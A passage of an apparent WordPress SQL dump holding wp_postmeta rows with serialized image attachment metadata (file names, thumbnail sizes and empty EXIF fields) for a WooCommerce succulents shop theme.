ile\";s:29:\"product9-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product9-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product9-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product9-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product9-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product9-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product9-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(134,1827,'_wp_attachment_image_alt','o'),(135,2988,'_wp_attachment_image_alt','a'),(136,4029,'_wp_attachment_image_alt','f'),(137,1919,'_wp_attached_file','2018/02/bottle-1.png'),(138,1919,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:110;s:6:\"height\";i:229;s:4:\"file\";s:20:\"2018/02/bottle-1.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"bottle-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"bottle-1-110x150.png\";s:5:\"width\";i:110;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"bottle-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(139,2992,'_wp_attached_file','2018/02/what-we-do-img-parallax-1.jpg'),(140,2992,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:564;s:4:\"file\";s:37:\"2018/02/what-we-do-img-parallax-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"what-we-do-img-parallax-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"what-we-do-img-parallax-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"what-we-do-img-parallax-1-600x176.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"what-we-do-img-parallax-1-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"what-we-do-img-parallax-1-1024x301.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"what-we-do-img-parallax-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"what-we-do-img-parallax-1-768x226.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:37:\"what-we-do-img-parallax-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:37:\"what-we-do-img-parallax-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:38:\"what-we-do-img-parallax-1-1536x451.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:37:\"what-we-do-img-parallax-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:38:\"what-we-do-img-parallax-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:37:\"what-we-do-img-parallax-1-550x564.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:564;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:38:\"what-we-do-img-parallax-1-1100x564.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:564;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"what-we-do-img-parallax-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"what-we-do-img-parallax-1-600x176.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"what-we-do-img-parallax-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(141,4048,'_wp_attached_file','2018/02/h4-portfolio-img-12.jpg'),(142,4048,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:768;s:6:\"height\";i:768;s:4:\"file\";s:31:\"2018/02/h4-portfolio-img-12.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h4-portfolio-img-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h4-portfolio-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h4-portfolio-img-12-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h4-portfolio-img-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h4-portfolio-img-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h4-portfolio-img-12-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h4-portfolio-img-12-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h4-portfolio-img-12-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"h4-portfolio-img-12-768x550.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"h4-portfolio-img-12-550x768.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h4-portfolio-img-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h4-portfolio-img-12-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h4-portfolio-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143,1919,'_wp_attachment_image_alt','o'),(144,1121,'_wp_attachment_image_alt','a'),(145,1122,'_wp_attached_file','2018/01/product9-gallery3.jpg'),(146,1122,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product9-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product9-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product9-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product9-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product9-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product9-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product9-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product9-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product9-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product9-gallery3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product9-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product9-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(147,4048,'_wp_attachment_image_alt','s'),(148,3406,'_wp_attachment_image_alt','h'),(149,1122,'_wp_attachment_image_alt','a'),(150,4049,'_wp_attached_file','2018/03/h4-img-14.jpg'),(151,4049,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:562;s:4:\"file\";s:21:\"2018/03/h4-img-14.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h4-img-14-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h4-img-14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"h4-img-14-600x176.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h4-img-14-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"h4-img-14-1024x300.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h4-img-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"h4-img-14-768x225.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h4-img-14-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h4-img-14-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"h4-img-14-1536x450.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"h4-img-14-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"h4-img-14-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"h4-img-14-550x562.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:562;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"h4-img-14-1100x562.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:562;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h4-img-14-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"h4-img-14-600x176.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h4-img-14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(152,2002,'_wp_attached_file','2018/02/flower.png'),(153,2002,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:289;s:6:\"height\";i:186;s:4:\"file\";s:18:\"2018/02/flower.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"flower-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"flower-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"flower-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154,3412,'_wp_attached_file','2018/02/h1-iwt-img-3.png'),(155,3412,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:247;s:6:\"height\";i:183;s:4:\"file\";s:24:\"2018/02/h1-iwt-img-3.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"h1-iwt-img-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"h1-iwt-img-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"h1-iwt-img-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(156,3412,'_wp_attachment_image_alt','a'),(157,2002,'_wp_attachment_image_alt','o'),(158,1124,'_wp_attached_file','2018/01/product10-gallery1.jpg'),(159,1124,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product10-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product10-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product10-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product10-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product10-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product10-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product10-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product10-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product10-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product10-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product10-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product10-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(160,3414,'_wp_attached_file','2018/02/h1-iwt-img-1.png'),(161,3414,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:185;s:6:\"height\";i:183;s:4:\"file\";s:24:\"2018/02/h1-iwt-img-1.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"h1-iwt-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"h1-iwt-img-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"h1-iwt-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(162,3414,'_wp_attachment_image_alt','a'),(163,2005,'_wp_attached_file','2018/02/Logo-500-x-.png'),(164,2005,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:147;s:4:\"file\";s:23:\"2018/02/Logo-500-x-.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"Logo-500-x--300x147.png\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"Logo-500-x--100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Logo-500-x--300x88.png\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Logo-500-x--150x147.png\";s:5:\"width\";i:150;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"Logo-500-x--300x147.png\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"Logo-500-x--300x147.png\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"Logo-500-x--100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(165,2005,'_wp_attachment_image_alt','a'),(166,3415,'_wp_attached_file','2018/02/h1-iwt-img-2.png'),(167,3415,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:178;s:6:\"height\";i:183;s:4:\"file\";s:24:\"2018/02/h1-iwt-img-2.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"h1-iwt-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\